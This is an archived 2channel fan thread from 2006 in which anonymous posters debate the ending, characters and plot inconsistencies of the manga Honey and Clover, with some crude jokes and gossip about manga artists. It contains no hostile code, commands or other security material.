>>180の人気に嫉妬



236 :花と名無しさん:2006/09/19(火) 18:58:21 ID:???0
180の人気に嫉妬

237 :209:2006/09/19(火) 19:18:46 ID:???0
>>234
そうですね。私は大学には行けなかったのでハチクロを読んで
大学って楽しそうだなーと思いながらハチクロで展開される
キャンパスライフをとても楽しんでいたのでちょっとがっかり
してしまったのかもしれません。
中高と先生といえば厳しいイメージだったので花本先生をみて
大学にはこんな先生もいるんだな、いいなーと思っていたので
なんだか原田の呪縛で大学から出れなかった的な展開に少し
ショックを受けたんだと思います。

238 :花と名無しさん:2006/09/19(火) 19:22:26 ID:???0
>>198
インドくらいなら人に迷惑かからないからいいじゃないか
一番痛いのはイラクに自分探(ry

239 :花と名無しさん:2006/09/19(火) 19:30:11 ID:???0
>>229
そこをあえてSSで書くことに意義があったんだろ。
内容は高度な批判になってるから面白いよ。
若干電波も感じるがw

240 :花と名無しさん:2006/09/19(火) 19:33:40 ID:???0
180のSS読めない…。
流れちゃったのか、叩かれたので本人が消したのか。
読みたかったな。
よかったら↓に投下してみてください。
http://sakura03.bbspink.com/test/read.cgi/eroparo/1115195698/

241 :花と名無しさん:2006/09/19(火) 19:36:19 ID:???0
>>237
大学だと、ゼミを通じて先生と生徒が仲良くするのはある。
でも、花本先生とはぐ・竹本・森田・山田・真山のような
ベッタリの関係はめずらしい気がする。

242 :花と名無しさん:2006/09/19(火) 19:48:19 ID:???O
スピッツの曲に影響受けてラスト変えたなら、たけのこだけ疎遠になりそうなエンドは悲しい。

243 :花と名無しさん:2006/09/19(火) 19:57:08 ID:???0
竹本ははぐ以外の女と恋愛したほうが幸せになれると思うよ…。

「宮大工のよもやま話」ってサイトに
棟梁の奥さんのブログが載ってた。
http://www.google.com/search?num=50&lr=lang_ja&q=%E5%AE%AE%E5%A4%A7%E5%B7%A5

あと、「ほぼ日」の糸井と宮大工インタビュー。
www.1101.com/education_ogawa/index.html

244 :花と名無しさん:2006/09/19(火) 20:10:30 ID:???O
そういやたけのこって1巻の冒頭で、『自分の作った料理がマズくてビックリして…』って独白してるけど、
寺修復のバイトしてる時に『小学校の頃、親が忙しいから料理やってて良かったぜ☆』みたいなこと言ってなかったっけ
DVD見てて疑問に思った

245 :花と名無しさん:2006/09/19(火) 20:13:51 ID:???0
>>244
そんな細かいことは作者が忘れました

246 :花と名無しさん:2006/09/19(火) 20:14:25 ID:???0
>>243
見てきたけど、男大所帯で大部屋でザコ寝とか
奥さんと結婚しても奥さんを全くかまってやれないとか
子供の勉強も見てやれないとか
師弟制度が今も残ってるとか…
立派な仕事だけど、とても大変な仕事だと思った。

やっぱりローマイヤや故原田タイプじゃないと
棟梁としてつとまらなさそうだし
弟子も女もついてこなさそうだ。
竹本が成長してそういう男になれればいいけど
そういう男の器ではない気がする。

247 :花と名無しさん:2006/09/19(火) 20:17:31 ID:???0
おそらく竹本の性格だから辛くてもやめようとせず続けると思う
んで、多分腰痛でも患って終了ってとこかな

248 :花と名無しさん:2006/09/19(火) 20:27:09 ID:???0
宮大工のサイトを色々見てきた。
棟梁のおっさんやじいちゃんは
渋みのあるかっこいい男なんだけど
弟子が、DQNそのものな外見の若者がたくさんいたよー。
竹本、勤まるのかいー(((( ;゚Д゚)))ガクガクブルブル
まぁ、マンガだけど。

249 :花と名無しさん:2006/09/19(火) 20:31:11 ID:???0
その
>DQNそのものな外見の若者
が、年月を経て
>渋みのあるかっこいい男
になるわけで

250 :花と名無しさん:2006/09/19(火) 20:33:02 ID:???0
そうなのかねぇ。
しかし、昔ならそういう、元不良→落ち着いていい男
って人もいたかもしれないけど
今、チャラチャラやってるDQNが
おっさんやじいさんになった時に
いい男になってる様子が想像つかないんだ…。

251 :花と名無しさん:2006/09/19(火) 20:33:54 ID:???O
いまさらですが、はちくろの中で誰が1番、好きですか?

252 :花と名無しさん:2006/09/19(火) 20:34:32 ID:???0
倉持くん

253 :花と名無しさん:2006/09/19(火) 20:36:23 ID:???O
倉持君!これは、マイナーな所から! いったい、倉持君はどうなったんだろぅ(・・?)

254 :花と名無しさん:2006/09/19(火) 20:52:54 ID:???0
山崎

255 :花と名無しさん:2006/09/19(火) 21:00:15 ID:???0 ?2BP(102)
おまけイラストでときどき出てくるよね
好みのメガネっこですぅ!ふふふぅ!

256 :花と名無しさん:2006/09/19(火) 21:00:41 ID:???0
間山は結局お持ち帰りしてたんですか?
1巻と、10巻のおまけですごく矛盾が生じるんですけど・・・

257 :花と名無しさん:2006/09/19(火) 21:06:07 ID:???O
山崎、いいよね☆素直なカンジが  あたしは、みわこさんは、本人気付いてなくても、山崎のこと好きだと思ったな☆

258 :花と名無しさん:2006/09/19(火) 21:09:14 ID:???0
>256
10巻のおまけで山田の勘違いにしたかったようだけど
1巻の「なぜそれを!?」という台詞が変だよね

「なぜそうなる!?」ならよかったんだけど

259 :花と名無しさん:2006/09/19(火) 21:10:15 ID:???O
》256          真山は、お持ち帰りはしてないと思うよ☆1巻であゆが真山に言ったことは、あゆの勘違いだよね。結局は、あゆと同じ大学&惚れらてる男ってことで、呼び出されてたってだけなんだよ☆

260 :花と名無しさん:2006/09/19(火) 21:21:19 ID:???0
>>180

昼保存してたの今読んだ。
最後までウミノと逆の主張しててワロス
電波っぽい文章にわざと書いてるだろw
職人芸乙。

261 :花と名無しさん:2006/09/19(火) 21:25:58 ID:???0
読み返してみたら、あゆの友達からいっぱいクレームの電話が来るのもおかしいし、
「あの女の人とまだ切れてなかったの」も???だよね・・・

262 :花と名無しさん:2006/09/19(火) 21:31:38 ID:???0
携帯の人改行とアンカーをなんとかしてくれ
あと☆乱用もやめれ

263 :花と名無しさん:2006/09/19(火) 21:33:18 ID:???0
あー、言っちゃったよ

264 :花と名無しさん:2006/09/19(火) 21:46:24 ID:???0
ハチクロ売ってきた
古本で200円で買ったのもあったのに1冊250円w

265 :花と名無しさん:2006/09/19(火) 21:56:11 ID:???0
180さん再ウプしてください
読みたい…

266 :花と名無しさん:2006/09/19(火) 22:44:19 ID:???O
ウミノが真山は本当は純真なのよ☆彡
ってことにしたくなってお持ち帰りをなかったことにしたんだろ

267 :花と名無しさん:2006/09/19(火) 23:21:36 ID:???0
>>256
多分真山は山田に嫌われようとしたんだよ

あと迷惑かけているのを隠そうとしてもいるな・・・



268 :花と名無しさん:2006/09/19(火) 23:25:09 ID:???0
ハチクロには善意の深読みが必須
疲れる・・

269 :花と名無しさん:2006/09/19(火) 23:29:39 ID:???0
いや単なる後付けなんでそんなに頑張って解釈してあげなくてもいーよw

270 :花と名無しさん:2006/09/19(火) 23:30:55 ID:???0
ちょwうすたがこの漫画褒めてたwww

271 :花と名無しさん:2006/09/19(火) 23:36:42 ID:???O
美大の爺さんたちなんか、まんまうすたの「マサルさん」のスーザンだったしな。うすたも嬉しいだろう。

好きな男性キャラ山崎に一票!
10巻読んでから「炎のたからもの」(題名うるおぼえ)をつい口ずさんでしまう。

272 :花と名無しさん:2006/09/19(火) 23:51:54 ID:???0
>>265
エロパロ板でやれ。

273 :花と名無しさん:2006/09/20(水) 02:02:17 ID:???0
>>11
ひでぇなこれ

羽海野に関係なく一条ゆかり最悪だな
米搗きバッタってどう見ても嘲笑の単語だろ
というか、何でこんなの載せたんだ?

274 :花と名無しさん:2006/09/20(水) 02:11:29 ID:???0
10巻の表紙を描く前に、ロッキーチャックでも観ちゃったんだろうな。

275 :花と名無しさん:2006/09/20(水) 02:21:34 ID:???0
連載の始めの方を読んでたときの真山の印象は
「合コンでお持ち帰りしたりとそれなりに遊んでるとこもある要領良い奴」である一方
「年上の女性の寂しさに気がついていざ本気になると不器用になっちゃう奴」
だったのになー(勿論ストーカーでキモいのは認める)
何でこう、みんな一途にズッコン☆ラヴ☆チェリーボーイカモーンになるの?
鉄人がカマトト女になっていく過程を半ば諦め目線で見てたけど、
番外編の山田に至ってはカマトトに加えて空気は読めないわウジウジだわで
「同性から見て最高にウザい女」では・・・

ちなみに後半で特に目に付いた
「☆」「も、〜だよ!?」「もっそい」「G☆J」「イエッフーイ☆」
が非常に嫌。

276 :花と名無しさん:2006/09/20(水) 02:35:56 ID:???0
大学生=合コン=お持ち帰り
この非大学生が勝手につけたイメージを持ち出してきたので
違和感を感じてたけど、やっぱりウミノって大学行ってなかったんだね。
こんなイメージ、実際大学生活経験してたら鼻で笑う。
てか作者自身合コンすら一回も行ったことないな。
「広告塔がわりに美人を誘う」って発想がわけわかんない。
山田っていうカワイイ子が来るって言っても、相手が山田を知らないんじゃ
意味ないし、山田を知ってて来るなら、その男(達)は山田狙いであって
山田にその気が全くなくても男の注目は山田に集中する。
だいたい合コンなんて前々から一個人を目当てに行くもんじゃない。
→広告意味ない→そもそも合コン経験があるなら「広告塔」なんて発想は浮かばない


277 :花と名無しさん:2006/09/20(水) 02:38:27 ID:???0
>>171
そうみたいだね。ばななはすぐ人の本名バラすよ。

278 :花と名無しさん:2006/09/20(水) 03:09:30 ID:???0
>276
カワイイ子(イイ男)来るからっつって写メ送って釣るのは、手口としてはド定番だけど、
何時の時代の合コンすかね?

279 :花と名無しさん:2006/09/20(水) 05:01:30 ID:???0
つか>>276が大学も合コンも行ったことなさそうな件
美人は普通に広告塔になるっしょ
「あいつのつれてくる友達ブスばっか」と思われたら次の誘いも減るしさ

280 :花と名無しさん:2006/09/20(水) 06:48:30 ID:???0
>>273
一条ゆかりは
少女漫画界の和田アキコみたいなオバハンで
悪口を言うのは
「毒舌を言っても相手に許されるくらい
 相手と仲良しなアテクシ」というアピールなんだよ。
だからその酷いコメントで、一条が羽海野と仲が悪い思うのは早計。

一条が常識ないのは、摂理の広告塔になるような女なことから
一目瞭然。
集英社編集部がドキュソなのもそう。

281 :花と名無しさん:2006/09/20(水) 08:07:25 ID:???0
>>277
銀色夏生のことも「みき子さん」って本名で書いてるね。

282 :花と名無しさん:2006/09/20(水) 08:22:28 ID:???0
吉本ばななは自分優先で相手の迷惑考えられない辺りウミノキャラと似てる。

>>280
一条さんは秋本氏には「毒舌を言っても相手に許されるくらい仲良し」だと
思ってるのかもしれないけど
唐突に出された羽海野さんの名前に関しては
嫌いな事を大勢の人に晒してるような雰囲気があるような気が。

283 :180:2006/09/20(水) 11:04:34 ID:???0
>>211さんや、>>226さん(の後半部分)、>>239さんの冴えた返答には正直驚きました。
>>260さんに至っては電波文のわざとらしさまでバレてて脱帽と言うほかないです。

「電波な子の妄想まき散らし」って思われることもある意味では狙い通りですが、
(”試した”というのは近いかもしれません。
”信者さんの結末代替請求に答えた”というのはちょっと違うつもりです)

本当の狙いをちゃんと読み取ってくれた人が居たので、有意義な投下でした。
ありがと。

284 :花と名無しさん:2006/09/20(水) 11:41:47 ID:???0
うすたワロスw

285 :花と名無しさん:2006/09/20(水) 11:49:23 ID:???0
公共の場でウミノタンの多方面媚まくりを指摘したのは
一条が初めてだね。
これまでは暗黙の了解だったのに。
やっぱ無神経なオバハンは違うわ。

286 :花と名無しさん:2006/09/20(水) 12:31:31 ID:???0
はぐと森田ってやっちゃったの?
それともただ添い寝してるだけ?
普通、お互い好きあった良い歳の大人が二人一緒の布団に
寝てたら、何もないって方がおかしいんだけど
ウミノワールドだからな。どっちなんだろ。

つーかこの漫画のキャラがセックスしてんのって
なんか気持ち悪い。真山とリカも気持ち悪かったな。
メルヘンとメンヘルが混同してる世界だから。

287 :花と名無しさん:2006/09/20(水) 12:44:58 ID:???0
>>286
そのへん、大槻ケンヂがインタビューでウミノに質問してたな。
ハチクロの登場人物は処女と童貞ばかりなのかと。
ウミノははぐらかしてたが…。

自分は、真山と森田と野宮と臭は非童貞だと思っていたが
もしかして臭って
童貞だったんだろうか?
(((( ;゚Д゚)))ガクガクブルブル

288 :花と名無しさん:2006/09/20(水) 12:54:30 ID:???0
竹本マジ可哀相。
竹本だけ二度とみんなと再会しなさそう。

竹本だけ、なんも残ってないよ。
というか何も得ることのできなかった大学生生活だ。
得られたのは、雑草サンドだけ。

289 :花と名無しさん:2006/09/20(水) 13:03:56 ID:???0
>>287
修は童貞臭い。自分的には確実に童貞。
森田も一巻の初めの頃は
経験がありそうな雰囲気があったが・・・今となっては。
真山も最初の頃は普通に遊んでそうな感じだったが
というかそういう設定だろうけど
なんか童貞臭い。飲み屋も然り。
山崎も童貞。経験があったとしても童貞臭い。
美和子は経験豊富な美人やりて上司風に見えて実は処女がチャームポイント。
山田も確実に処女。
リカは処女じゃないが、なんか未亡人って設定が処女のかわりっぽい。
はぐは池沼の身障天使。
たけのこはチェリーボーイ。

290 :花と名無しさん:2006/09/20(水) 13:06:02 ID:???O
キャラごとに年表作ってるんだっけ?
なら何故真山のお持ち帰り疑惑を強引にナシにしたんだろうか、山田をイタイキャラにしてまで。
望みのない未亡人リカに焦がれながら、欲求は他の女で解消する男でいいじゃん別に。

遊んでそうなクールなキャラなのに、ストーカーまがいにまでなるほど溺れてしまったというギャップがいいんじゃないのか

291 :花と名無しさん:2006/09/20(水) 13:18:09 ID:???O
遊びを知った俗っぽいヤローなんかより、
純粋無垢な男の子が好きなんじゃない?

292 :花と名無しさん:2006/09/20(水) 13:22:23 ID:???O
>>291
それは竹本だけでいいじゃん・・・。モテるけど興味がない森田も童貞だとしても、それじゃみんな同じようなキャラになるのに。

初めはいろんなタイプのキャラがいるように見えたが、最後に女キャラはみんな依存的姫キャラで、男はみんな一途で純粋=童貞キャラだったということか。

293 :花と名無しさん:2006/09/20(水) 13:22:35 ID:???0
オサレに気を使う男子が苦手なんだもんね

294 :花と名無しさん:2006/09/20(水) 15:32:52 ID:???0
>>290
>遊んでそうなクールなキャラなのに、ストーカーまがいにまでなるほど溺れてしまったというギャップ

自分も真山をそう思ってたんだが、後付設定の
真山のお持ち帰りはイタイ山田の勘違い…という設定のせいで
おかしくなっちゃったね。

羽海野さんがキャラごとに年表作ってるというのは
インタビューで自分を良く見せるためについたウソ・フカシだと思う。
「はぐの父親ははぐを溺愛している厳格な警察官
  →はぐが知らないうちにどっかの女と出来婚するようなデタラメな父親」
のように、自分の描いたマンガの最初の設定を忘れるような人が
年表作ってストーリーに整合性があるように作ってるとは思えない。
そもそも、うみのさんは、ミュージシャンや芸能人に影響されて
ストーリーコロコロ変えるような人なのだから。

295 :花と名無しさん:2006/09/20(水) 17:38:37 ID:0JAmgYqlO
はぐと森田やってないでしょ
好き同士が一緒にいて云々とあるが
女は頭切って腕も神経くっつくかいなかの重傷患者だぜ
普通やらねーだろ

296 :花と名無しさん:2006/09/20(水) 18:06:10 ID:???0
遅レスだけど「自分探し」がなんで痛いかわかった。

「今のイケてない自分は本当の自分ではない。
 本当の自分は別のどこかにあるはず」
という考えが痛いんだ。


今回のスレではテンプレが総アボーンしてるけど
過去ログにあったテンプレのこれ。↓

-------------------------------------------------------
●● 竹本の不幸  ●●
・小学生の頃父が他界。高校で母が再婚するが、
 自分の進む道がわからなくなる。
 この頃からすでに彼の自分探しは始まっていた。
 探さない方がいいのに。
・浜美入学早々森田に中学生みたいな髪型にされ一年間振り回される。
・天才はぐに一目惚れし、己の平凡さを嘆き将来に不安を覚える。
 ここから真の不幸が始まる。
-------------------------------------------------------

本当に探さなければよかったのに。

297 :花と名無しさん:2006/09/20(水) 18:41:39 ID:???0
>>295
いきなり子供産んでびっくりさせる。

298 :花と名無しさん:2006/09/20(水) 19:00:07 ID:???O
年表は作ってると思うよ
そういうの好きそうだから。ただ、書き換えてるんだよ
何度も何度も、萌えが変化するたびに

299 :花と名無しさん:2006/09/20(水) 20:11:19 ID:???0
これで実ははぐが森田の子供妊娠してたとかなったら
一気に昼ドラだな

300 :花と名無しさん:2006/09/20(水) 20:12:13 ID:???0
結局ロンリーウルフのまま終わったのって竹本だけか

301 :花と名無しさん:2006/09/20(水) 20:20:50 ID:???0
作者から一番愛されていなかったキャラ、竹本

302 :花と名無しさん:2006/09/20(水) 20:22:53 ID:???0
竹本にはクローバーサンドで十分だよ

303 :花と名無しさん:2006/09/20(水) 20:24:37 ID:YDgnn+Q10
クローバーサンドのシーン最初に読んだとき、やっぱ終わりって感じで
ジーンってきたけど、でも心の奥には絶対クローバーって汚いよなぁ
って食うのかよ!みたいなツッコミがあったわ
ハチミツとクローバーってタイトルが来ていいんだけどでも冷静に考えるとやっぱねぇ

304 :花と名無しさん:2006/09/20(水) 20:27:28 ID:???0
雑誌を次々に廃刊にさせたり
竹本役の声優を重体にしたり
Uの人の法則オソロシス

305 :花と名無しさん:2006/09/20(水) 21:16:43 ID:???0
>>296
竹本は自分を探しに、自発的に旅立ったわけではない
周りが勝手にそう解釈してるだけ
あれは単なる蒸発で無意識の逃避行動 発作的なものだ

306 :花と名無しさん:2006/09/20(水) 21:23:00 ID:???0
竹本・・・(´・ω・`)

307 :花と名無しさん:2006/09/20(水) 21:46:06 ID:???0
>>305は竹本をフォローしてるように見えて実はどん底に落としてるな

308 :花と名無しさん:2006/09/20(水) 22:08:49 ID:???0
実際、あの距離を自転車で走破するとなると当たり前だけど相当疲れる
頭の中空っぽになるよ 道中は自分の将来のこととか全く考えてなかったと思う
頭を切り替えられていいリフレッシュにはなったろう
有酸素運動で鬱病を克服する例も多いしな やっぱり健全な肉体には健全な精神が宿る
だから竹本はこれから慣れてなさそうな肉体労働系やるみたいだけど
毎日へろへろになるまで働いて、お腹いっぱいご飯食べてけば人生がとてもシンプルに感じられるし
今までみたいにうじうじしないで真っ直ぐ成長できるんじゃないのかな

309 :花と名無しさん:2006/09/20(水) 22:11:46 ID:???O
竹本はちゃんと職を見つけて帰ってきました><

310 :花と名無しさん:2006/09/20(水) 22:33:21 ID:???0
そっか、竹本ってウジウジ男だったのかぁ

311 :花と名無しさん:2006/09/20(水) 22:37:34 ID:???O
ネタに困れば個々の人生年表の改変くらいなんのその、ですよ?


312 :花と名無しさん:2006/09/20(水) 22:46:35 ID:???0
竹本大好き

313 :花と名無しさん:2006/09/20(水) 22:47:57 ID:???0
>>308
どんなにウジウジしても
いっぱいはたらいて
おいしいものたべて
うんこすれば
なおるよ!

                     
                 ハ_ハ  
               ('(゚∀゚∩ なおるよ!
                ヽ  〈 
                 ヽヽ_)




314 :花と名無しさん:2006/09/20(水) 22:53:26 ID:???0
>>313
はぐちゃんおてせいの
サンドイッチたべたら
げりに なったよ!


                 ハ_ハ  
               ('( ゚∀゚∩  つらいよ!
                ヽ  〈   しかも げり なおんねぇよ!
                 ヽヽ_)



はぐちゃんから 
きらわれてるのかなぁ…

315 :花と名無しさん:2006/09/20(水) 23:01:28 ID:???0
清清しく読了しました。
登場人物のそれぞれに、感情移入できる作りで
最後まで飽きず、終わったのが今も淋しいくらい。

男の子が何を考え、
女の子が何を考え、
大人がどう振舞うか、振舞えるか。
それぞれがどのように感情を吐き出せるのか。
吐き出せない思いはどうしたか。
吐き出した思いはどうなったか。
だれが行動したか、それを誰が受けとめたか。

それで物語がまとまったのはすごい。
純粋に、ある人間達の青春群像として素晴らしかった。


316 :花と名無しさん:2006/09/20(水) 23:06:02 ID:???0


317 :花と名無しさん:2006/09/20(水) 23:09:33 ID:???0
>>315
↓ここでどうぞ。

「ハチミツとクローバー」 メンバー数:31632人
http://mixi.jp/view_community.pl?id=48441

318 :315:2006/09/20(水) 23:18:05 ID:???0
久々にここ板来たのだけど、
何?マンセーハブ的な流れかしら。
ここは な ん な の で す か

319 :花と名無しさん:2006/09/20(水) 23:20:57 ID:???0
書き方が特殊だったからじゃない

320 :花と名無しさん:2006/09/20(水) 23:21:59 ID:???0
>>309
職を見つけて帰って来たというと聞こえはいいけど、
実際は無計画無秩序な逃亡の末に何か自分を受け入れてくれそうなところがあって
も、俺ってラッキー☆就職先GET!というちょっと安直な印象を受けるんだけどなぁ・・・
しかし竹本は1回目の卒業制作から自分探しでウダウダしてて
悶々した挙句に入院→留年でやっと一皮向ける前触れかと思いきや
夏の自転車旅行までまだウジウジしてて、引っ張りすぎだよ作者・・・と思った
まあ現実でも簡単に自分のやりたいことが見つかるわけではないけどさー

321 :花と名無しさん:2006/09/20(水) 23:33:03 ID:???0
最近読み始めて一気に読み終わった俺の直後の感想は>>315みたいなものだった。
清々しい何かとどこか寂しいような切ないようなものが同居するえもいわれぬ満たされた感じ。
でも全体読み返したりここで指摘されてるような部分を考えるとなんかいろいろ粗が見えてきて(;´Д`)
そんでも各場面だけ見ればやっぱ2行目に書いたようなものを感じる。

この前の授業の時に後のほうに座ってた腐女子が森田もいいけどやっぱ真山派みたいなこと言っててワラタ
あとあれでほんと終わりなの?みたいなこと話してた。

322 :花と名無しさん:2006/09/21(木) 00:05:04 ID:5M80ynIu0
修とひっついてはぐは幸せになると思うよ。森田じゃだめだ。
二人とも破滅的だから。
はぐは修のことが昔から大好きだったんでしょ。
個人的には良い終わり方だったと思う。
自分の気に入る・満足のいく終わり方でなかったとしても、また、
自分と違う意見・感想を持つ人や作者を悪くいうのもおかしいと
思います。
映画や小説と同じでそういう一つの作品であって、読者に色々感
じてもらいたかったんだろうから。


いや、みんな感想をいっているだけか。だったらいいんだけど。



ああ、マジレスかっこわる。

323 :花と名無しさん:2006/09/21(木) 00:20:06 ID:???O
ハチクロのプラス面だけを評価して
相対的な意見は求めてない人はミクシ向き
否定派も含めてハチクロを本音で
意見したい人は2ちゃんで良く住み分けできてるよ。
こっちの方が作品を皆よく分析してて
読むのは面白いよね。
ミクシの褒めちぎりはお腹イパーイ。
このスレの内容でウミノたんの分析本が作れそうだね。

324 :花と名無しさん:2006/09/21(木) 00:22:50 ID:???0

http://www9.big.or.jp/~dbzhako/

ワロタwwww

325 :花と名無しさん:2006/09/21(木) 00:39:39 ID:???O
>>322

中にはオイオイというのもあるけど、大半はまっとうな感想だと読んでいて思うがね。
いい部分・悪い部分を冷静に分析しているのを読むと興味深くて面白いし。

私の感想としては、この漫画のいい部分は、絵と個々のエピソードの見せ方のうまさ。
悪い部分はストーリー・キャラ共に一本骨が通っていない感じ。雰囲気で流しすぎ。
全体の恋愛観とか人間観が私は合わなかった。

>>323
同意。

326 :花と名無しさん:2006/09/21(木) 00:53:38 ID:???0
>>322
はぐと森田が破滅的で修はそうじゃないってことの根拠を言ってくれないと
説得力ないよ
万人がそう感じてるわけじゃないんだからさ

327 :花と名無しさん:2006/09/21(木) 01:32:06 ID:???0
すっごい基本的なコトを聞いて良かですか?

はぐがケガして神経やられたのって右手ですよね? 左 手 は ?
そりゃ利き手をやられたらキツイだろうけど、
左手は平気ならあそこまでの反応は無いような…でも左右両方とは書いてないような?
…と気になって気になって……どなたか教えて下さいお願いしますorz

328 :花と名無しさん:2006/09/21(木) 01:40:00 ID:???0
利き手に対して日常生活で求める水準と
芸術家が作品作る際に求める水準は普通違うでしょ
他の手を使うピアニストとかそういう専門職に置き換えれば分かり易い

329 :花と名無しさん:2006/09/21(木) 01:44:42 ID:???O
>>327
何か描いたりものを作ったりする時って思ってる以上に両手を使うもんだよ
例えば、どちらかの手で紙を押さえないと思うように描けないし

ましてや何時間もぶっつづけて作業するんだからさ

330 :花と名無しさん:2006/09/21(木) 01:54:05 ID:???0
手と言えば、最終回にはぐの手は完治してたんだよね?

331 :花と名無しさん:2006/09/21(木) 01:57:50 ID:???O
>>318
>>315みたいな気持ち悪いマンセーをやるのがいるから仕方ない

332 :花と名無しさん:2006/09/21(木) 02:24:56 ID:nFv73SXcO
>>313
たまに見るけどこれの元ネタってなに??

333 :花と名無しさん:2006/09/21(木) 02:55:24 ID:???0
土曜日になったら教えてやる

334 :花と名無しさん:2006/09/21(木) 03:36:59 ID:kwHh5GIYO
はぐは激しく森田の変な棒出したり入れたりしたから腕が悪化したんだお

335 :花と名無しさん:2006/09/21(木) 04:11:48 ID:???0
>>334
ワラタ

ところで話変わるけどこの前松屋じゃないけど、某牛丼屋で1000円渡したの。
店員がレジに打ち込んでで580円ですって言ってまた俺のところに来てお金を催促。
ん?俺いま1000円渡したじゃん、店員は気づかずに卵だけ食って帰ったw

いや、俺が店に入ったとき店員はいなかったんだけど、牛丼おいしいって言ってたw
それでお金払うときに1000円って分かってるから渡した。
店員まだレジ売ってないから卵だけですねって580円って気づいてレジ売って580円って。
おれ1000円渡したじゃんっていったのに580円ですって。店員卵おいしいのはわかったって言ってたw

336 :花と名無しさん:2006/09/21(木) 04:38:39 ID:???O
いろんな意見があって面白いですね〜。
自分の感じた違和感・不満としては、
1.途中で絵のタッチが変わりすぎ。特にはぐ。
43話に登場しなくて、42話までと44話からであからさまに違う。
この辺りで作者の心境に大きな変化があった?
2.はぐは初期の感じでは明らかにメンヘルだと思うが、
その設定が活かしきれていないというか、ウヤムヤのうちに本編が終了してしまった。
3.男性・女性の描写が、悪い意味でステレオタイプすぎると思った。

337 :花と名無しさん:2006/09/21(木) 08:35:47 ID:???O
>>335
の文章 意味がわからない....

338 :花と名無しさん:2006/09/21(木) 09:06:55 ID:???0
探偵ファイルで、雑草を食べる実験が載ってた。

ttp://www.tanteifile.com/diary/2006/09/05_01/index.html

結果、尻から虫(なんかの寄生虫)が出たらしい。

(つ;Д`) 竹本…。

339 :花と名無しさん:2006/09/21(木) 09:14:44 ID:???0
>>338に追加。
探偵ファイルの雑草を食う実験では
クローバーも食ってる。
味は、すっぱいらしい。
ttp://www.tanteifile.com/diary/2006/09/05_01/index2.html

340 :花と名無しさん:2006/09/21(木) 10:01:58 ID:???0
>>180さんの小説もう一度UPしてくれませんか?!

341 :花と名無しさん:2006/09/21(木) 10:16:39 ID:???0
>>340
ここじゃないスレにウプされてるよ。

342 :花と名無しさん:2006/09/21(木) 10:32:57 ID:???0
>>340
どこにUPされているのでしょうか?
差し支えなければおしえていただけませんか?

343 :花と名無しさん:2006/09/21(木) 11:24:46 ID:???O
はぐはいつから自分のことを、はぐ=私というようになった?

344 :花と名無しさん:2006/09/21(木) 11:25:25 ID:???0
>>180さんの小説もう一度UPしてくれませんか?!

345 :花と名無しさん:2006/09/21(木) 13:05:31 ID:???O
はぐって最後の方で完全に作者の自己投影キャラになってしまったな

346 :花と名無しさん:2006/09/21(木) 13:12:04 ID:???O
雑誌休刊を「好きな人を守れなかった感じに近い」と言ったり、はぐの辛さはクリエイターならわかってくれると言ったり、奥ゆかしく見せかけて傲慢さが見え隠れしてる気がするんだけど・・・

347 :花と名無しさん:2006/09/21(木) 13:29:50 ID:???0
>>342-344
このスレ内をよく読んでみなさい。

348 :花と名無しさん:2006/09/21(木) 15:29:54 ID:???0
>>342 >>344
このスレ内にちゃんと書いてありますけど
見つけても、お礼は言わないで黙ってそのスレに飛んでください。

349 :花と名無しさん:2006/09/21(木) 16:56:26 ID:???0
931 :名無しさん@お腹いっぱい。:2006/09/20(水) 21:25:17 ID:FdAINV50O
>>913
Hの特集の一環でクリエイターに見てもらう企画
他にくらもちふさこ、羽海野チカ、山崎貴(映画監督、三丁目の夕日の)
直井はくらもち好きって言ってたな。羽海野はバンプ好きと
あと番場インタブーとバンプPVヒストリーで24P掲載


バンプスレより 本当?

350 :花と名無しさん:2006/09/21(木) 17:27:29 ID:???0
>>349
探してみた。
ttp://www.rock-net.jp/h/next.html
バンプ・オブ・チキンが音楽を担当した無声映像作品
『人形劇ギルド』を観た感想インタビューだってさ。

351 :花と名無しさん:2006/09/21(木) 18:01:42 ID:???0
米つきバッタだからなんでも誉めるんだろ。
でも、アマチュア時代の友達のことは「いじめられてた」
「友達ができなくていつも泣いていた」とほざく成人。

352 :花と名無しさん:2006/09/21(木) 18:04:34 ID:???O
ウミノタンの未来日記☆

「バンプの藤原君と対談」



φ(._.)

353 :花と名無しさん:2006/09/21(木) 18:07:33 ID:???0
>>352
間違いなく次の作品にそっくりな男が出てくるな。

354 :花と名無しさん:2006/09/21(木) 19:22:38 ID:???0
ハチミツとクローバー 人気投票
ttp://www.37vote.net/anime/1158833373/

355 :花と名無しさん:2006/09/21(木) 21:42:57 ID:???O
バンプは曲は別として
ファンに同人女が多いんだよな…
ポルノも同じく

痛々しいファンも付きやすいし

356 :花と名無しさん:2006/09/21(木) 23:45:48 ID:???O
>>355
バンプは本人達もヲタだしなあ…。
アルエの由来を知った時は驚いた。

357 :花と名無しさん:2006/09/22(金) 00:42:00 ID:???0
327>>328-329
お返事ありがdです。
その辺りはまぁわかるんですけど、せめて、
前向きに「左手は使えるから」って実際に創る→「左手だけじゃダメ」って改めて愕然とする
とかの無駄なほどに判り易いワンクッションが欲しかったな…と、
クリエイターじゃない人間としては思ってしまって。
『モノの材質が判断出来ない』の描写で話が進んで終わったので
「材質なら左手でもわかるんじゃ…」とか思……orz

358 :花と名無しさん:2006/09/22(金) 01:44:49 ID:???0
>>357
それについてどこかのスレで言及されてた
油絵は腕と肩の動きの方が重要で絵筆を固定すれば結構描けるものらしい

骨折した右手を固定したまま模型作ったとかいう話もあったなぁ

359 :花と名無しさん:2006/09/22(金) 01:57:56 ID:???0
ゲージツなんかじゃないんだけど、油絵を描く仕事をしています。
右手で物の材質がわからなくなったら、そりゃショックだとは思うよ。
でも、傷はてのひらで、腕じたいは無事なんだよね。
腕が動かせて、筆を指全体でホールドできさえすれば、絵を描くのに
それほど支障はない。
手首から先って、実はあまり動かさないよ。

他人の人生を全部もらうほどのダメージではないよなあ。
リハビリ含めて、再起後、起動に乗るまでの1年間くらい世話になれたら
精神的にも助かるだろうけど。

360 :花と名無しさん:2006/09/22(金) 02:01:54 ID:???0
あああ〜リロードしない間に・・・

他のスレで言及されてたんですね。
したり顔で書き込んじゃってすいません。

361 :花と名無しさん:2006/09/22(金) 03:25:48 ID:???0
>>359
でもはぐの場合絵だけじゃなく大理石彫ったりプロンズ彫刻みたいのとかも
やりたいんじゃないの?

362 :花と名無しさん:2006/09/22(金) 06:05:44 ID:Dt/ENM4sO
やっぱり手が使えないはぐのショックは共感しにくい人もいるね

手を使う仕事してる人なんかの方がわかりやすい心情なんだろうが、そうじゃない人にも共感しやすく描かないといけなかったんじゃない?
と感じた

